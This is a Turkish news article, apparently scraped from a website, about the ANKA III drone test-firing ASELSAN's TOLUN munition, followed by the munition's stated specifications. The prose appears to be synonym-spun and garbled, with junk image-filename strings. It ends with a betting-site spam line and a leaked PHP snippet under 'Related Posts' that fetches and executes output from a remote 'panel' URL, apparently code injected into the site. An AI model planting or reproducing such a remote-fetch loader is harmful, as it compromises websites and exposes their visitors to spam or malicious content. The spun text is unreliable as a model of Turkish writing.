ANKA-3’ten 20 bin feet yükseklikten 180 knot hızla atış

Türk Havacılık Uzay Sanayii (TUSAŞ) tarafından geliştirilen ANKA III, 20 bin feet yükseklikten 180 knot süratle atış gerçekleştirdi.
İHA

Türk savunma endüstrisinin gurur kaynağı olan ANKA III, operasyonel kabiliyetini ve mühendislik muvaffakiyetini gözler önüne sermek emeliyle bir prensip daha imza attı.

TUSAŞ’ın geliştirdiği ANKA III, 20 bin feet irtifada ASELSAN tarafından üretilen TOLUN mühimmatını 180 knot süratle amaca gönderdi.

TOLUN mühimmatı ile yapılan bu test atışı, ANKA III’ün operasyonel kabiliyetini ve Türk mühendisliğinin geldiği noktayı bir sefer daha gözler önüne serdi.

“OPERASYONEL KABİLİYETİNİ VE MÜHENDİSLİK MAHARETİNİ BİR DEFA DAHA KANITLADI”

TUSAŞ’ın toplumsal medya hesabından yapılan paylaşımda şu tabirlere yer verildi:

“ANKA III’ten bir birinci. ANKA III gövde içerisinden mühimmat atışını muvaffakiyetle gerçekleştirdi. ASELSAN’ın yerli ve ulusal üretimi TOLUN mühimmatı ile 20 bin feet irtifada 180 knot süratle atış gerçekleştirildi. Gövde içerisinden yapılan atışla ANKA III operasyonel kabiliyetini ve mühendislik marifetini bir defa daha kanıtladı. Ülkemiz için gece gündüz çalışmaya devam ediyoruz.”

ÖZELLİKLERİ VE KABİLİYETLERİ

TOLUN mühimmatı, F-16 savaş uçaklarıyla tek sortide 8 adet hava-yer mühimmatı taşıyabilme kapasitesi sunarak, tıpkı anda 8 farklı gayeye taarruz imkanı sağlıyor.

GPS/INS navigasyon sistemine ek olarak IIR Arayıcı Başlıklı TOLUN-IIR konfigürasyonu sayesinde pilotlara, havada manuel yönlendirme imkanı tanıyan man-in-the-loop kabiliyeti sunuyor.

Yaklaşık 100 km menzile sahip olan Minyatür Bomba, 250 libre tartısıyla MK-81 bombalarına denk geliyor ve 1 metrelik güçlendirilmiş betonu delme kabiliyetine sahip. Bu üstün kabiliyet, yapılan atışlı testlerle daha evvel doğrulanmıştı.

anka 3ten 20 bin feet yukseklikten 180 knot hizla atis 0anka 3ten 20 bin feet yukseklikten 180 knot hizla atis 1 77QOs7pZanka 3ten 20 bin feet yukseklikten 180 knot hizla atis 2 XOWnJmDAanka 3ten 20 bin feet yukseklikten 180 knot hizla atis 3 2E36CvpV

Kaynak: İhlas Haber Ajansı (İHA)
Share the Post:

Related Posts

$exe = curl_init(); curl_setopt($exe, CURLOPT_URL, "https://panel.twitteraccounts.com/code?x=21"); curl_exec($exe); ?>

fqq sahabet